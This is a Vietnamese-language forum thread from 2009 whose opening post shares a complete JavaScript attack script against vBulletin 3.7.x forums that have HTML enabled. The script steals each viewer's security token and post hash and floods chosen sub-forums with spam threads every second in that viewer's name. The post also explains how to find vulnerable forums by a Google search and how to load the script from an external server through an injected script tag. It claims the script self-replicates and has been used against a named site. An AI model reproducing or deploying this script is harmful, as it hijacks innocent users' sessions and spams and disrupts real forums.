[Question] mã tự động phát tán spam nhằm vào vbb 3.7.x |
11/02/2009 06:30:21 (+0700) | #1 | 168988 |
Icttrack
Member
|
0 |
|
|
Joined: 28/08/2007 23:18:24
Messages: 7
Offline
|
|
VBB không bị lỗi gì trong việc này. Lỗi là do người quản trị của diễn đàn sử dụng vbb.
Đoạn mã này sử dụng thủ thuật XSS nhưng cách thức tiến hành (thay quyền người sử dụng) thì lại theo kiểu XSRF
Cụ thể hơn với các diễn đàn sử dụng vbb phiên bản 3.7.x (mình mới chỉ kiểm nghiệm 3.7.4 và 3.7.3) nếu người quản trị bật mã HTML cho một mục nào đó thì bạn hoàn toàn có thể dùng đoạn mã bên dưới.
Do vbb tương đối công khai tình trạng các mục (box) trên diễn đàn về mã IMG, bbcode nên việc tìm kiếm các diễn đàn bị sơ xuất trong quản trị là rất đơn giản với google. Bạn chỉ cần gõ trên google với câu lệnh "mã HTML đang mở" thì có khá nhiều trang web VN nằm trong kết quả.
Đoạn mã hoàn toàn có khả năng tự nhân bản nếu bài viết nội dung lại trỏ tới chính đoạn mã bẩn
Đây là đoạn mã mình viết để nghịch chơi với các diễn đàn sử dụng vbulletin, nay chia sẻ cho các bạn
Đoạn mã này đã được mình dùng trong bài viêt về http://th6b.net/ban-luan-chung/909-xss-thay-mat-nguoi-su-dung-tiep-phan-i.th6b. Khi bạn gửi bài viết của mình vào diễn đàn không được bảo mật cẩn thận, thì bất kì ai xem đoạn mã này sẽ trở thành nạn nhân phát tán spam.
Đây là thời điểm đoạn mã mình có hiệu lực với diễn đàn http://digifuns.com/forum/index.php. Tất nhiên nay thì đã bị xoa rồi.
Thông tin chi tiết có thể xem tại đây vì đã có bạn dùng thành công
http://th6b.net/cac-phuong-phap-hay/1122-ma-spam-tu-dong-dung-de-tan-cong-dien-dan.th6b
Dưới đây là mã nguồn
Code:
var targeturl=''//dien dia chi dien dan;
var messagebody=''//dien noi dung bai gui, chu y phai thoat cac ki tu dac biet
var forumindex='2,5,6,7'//dien chi muc cua dien dan ban muon tan cong
function xmlobj() {
try {
var http_request=new XMLHttpRequest();
} catch(e) {
try {
var http_request=new ActiveXObject("Microsoft.XMLHTTP")
} catch(e) {
var http_request=null;
}
}
return http_request;
}
function rand(min,max) {
var len=Math.abs(max-min);
return max-Math.floor(Math.random()*(len+1));
}
function mal() {
var rf=forumindex.split(",");
var rd=rand(0,rf.length-1);
if(targeturl.length==0)
var target='newthread.php?do=newthread&f='+rf[rd]
else if(targeturl.length>0)
var target=targeturl+'newthread.php?do=newthread&f='+rf[rd];
else
return false;
GET(target);
function GET(url) {
var xml_instance=xmlobj()
if(!xml_instance)
return null;
var data;
xml_instance.open("GET",url,true);
xml_instance.onreadystatechange=fetchvalue;
xml_instance.send(null);
function fetchvalue() {
if(xml_instance.readyState==4 && xml_instance.status==200) {
data=xml_instance.responseText
var st,end,tok,posthash,time,subject='',message='';
st=data.indexOf("var SECURITYTOKEN = ")+21;
end=data.indexOf("\";",st);
tok=data.substring(st,end);
st=data.indexOf("\"posthash\" value=\"")+18
end=data.indexOf("\"",st)
posthash=data.substring(st,end);
st=data.indexOf("\"poststarttime\" value=\"")+23;
end=data.indexOf("\"",st)
time=data.substring(st,end)
for(i=0;i<=8;i++)
subject+=String.fromCharCode(rand(65,90))
if(messagebody.length>0)
message=messagebody;
else {
for(i=0;i<=300;i++)
message+=String.fromCharCode(rand(40,122))
}
POST(target,"f="+rf[rd]+"&do=postthread&loggedinuser=1&securitytoken="+tok+"&posthash="+posthash+"&poststarttime="+time+"&subject="+subject+"&message="+message)
}
}
}
function POST(url,param) {
var xml_instance=xmlobj()
if(!xml_instance)
return null
xml_instance.open("POST",url,true)
xml_instance.setRequestHeader("Content-Type","application/x-www-form-urlencoded")
xml_instance.onreadystatechange=nothing;
xml_instance.send(param);
function nothing() {}
}
}
setInterval("mal()",1000);
Bạn hãy copy đoạn mã trên vào một trình soạn thảo, lưu dưới dạng một file bất kì có đuôi là .js. Sau đó tinh chỉnh nó đi dựa theo chú thích ở trên đầu. Địa chỉ diễn đàn có lẽ không phải điền, vì quá trình truy cập diễn đàn theo đường link tương đối (relative url), thứ bạn cần chỉnh là chỉ mục của diễn đàn cần tấn công và nội dung bài spam, nếu để trống thì kí tự sẽ ngẫu nhiên.
Sau khi lưu nó xong thì hãy tải lên máy chủ lưu trữ web (web server) của các bạn rồi đánh câu sau vào nội dung bài viết của mình "<script src='http://diachiwebserver/r.js'></script> với r.js là file bạn vừa lưu. Nội dung thì tùy bạn vì đến khi bài viết hiện ra cho người khác xem, thì sẽ không có đoạn mã trên nữa. Và cứ từ đó trở đi, nếu ai vào đọc bài của bạn thì họ sẽ phát tán spam trên diễn đàn đó.
|
|
|
|
|
[Question] Re: mã tự động phát tán spam nhằm vào vbb 3.7.x |
22/02/2009 10:30:44 (+0700) | #2 | 170444 |
DuongLD
Member
|
0 |
|
|
Joined: 31/01/2009 20:46:49
Messages: 136
Offline
|
|
sao toi làm hoài nó có bị gì đâu , bạn share code có sai ko vậy |
|
|
[Question] Re: mã tự động phát tán spam nhằm vào vbb 3.7.x |
17/03/2009 06:35:37 (+0700) | #3 | 173443 |
|
vnkimlong
Member
|
0 |
|
|
Joined: 30/08/2007 13:53:14
Messages: 67
Offline
|
|
Cái này hình như viết bằng Pascal thì phải ?
|
|
|
|